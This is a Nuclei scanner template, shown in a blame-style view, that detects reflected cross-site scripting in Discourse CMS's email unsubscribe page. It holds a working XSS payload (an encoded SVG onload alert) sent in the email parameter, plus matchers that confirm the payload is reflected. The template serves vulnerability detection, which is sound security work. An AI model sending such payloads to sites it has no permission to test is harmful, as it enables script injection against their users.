nuclei-templates/vulnerabilities/other/discourse-xss.yaml

28 lines
574 B
YAML
Raw Normal View History

2020-09-01 02:25:25 +00:00
id: discourse-xss
2020-04-08 16:10:51 +00:00
info:
name: Discourse CMS - XSS
2020-04-08 16:10:51 +00:00
author: madrobot
2020-05-24 22:19:21 +00:00
severity: medium
description: Cross-site scripting (XSS) on Discourse CMS
tags: xss,discourse
2020-04-08 16:10:51 +00:00
requests:
- method: GET
path:
2021-03-04 16:02:34 +00:00
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
2020-04-08 16:10:51 +00:00
matchers:
- type: status
status:
2020-05-24 22:19:21 +00:00
- 200
2020-04-08 16:10:51 +00:00
- type: word
words:
2021-03-04 16:02:34 +00:00
- "<svg/onload=alert(xss)>"
2020-04-08 16:10:51 +00:00
part: body
- type: word
words:
- "text/html"
part: header